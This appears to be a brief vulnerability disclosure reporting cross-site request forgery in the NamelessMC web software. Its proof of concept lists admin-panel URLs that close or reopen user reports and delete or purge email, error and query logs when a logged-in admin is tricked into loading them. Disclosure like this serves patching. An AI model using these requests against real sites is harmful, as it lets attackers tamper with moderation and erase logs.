Cross-Site Request Forgery (CSRF) in namelessmc/nameless
Oct 14th 2021
More instances of CSRF
Proof of Concept
/index.php?route=/panel/users/reports/&action=close&id=1 /index.php?route=/panel/users/reports/&action=open&id=1 /index.php?route=/panel/core/emails/errors/&do=delete&id=2 /index.php?route=/panel/core/emails/errors/&do=purge /index.php?route=/panel/core/errors/&log=fatal&do=purge /index.php?route=/panel/minecraft/query_errors/&action=purge
This vulnerability is capable of tricking the admin to close and open user reports against other players, deletion of important logs.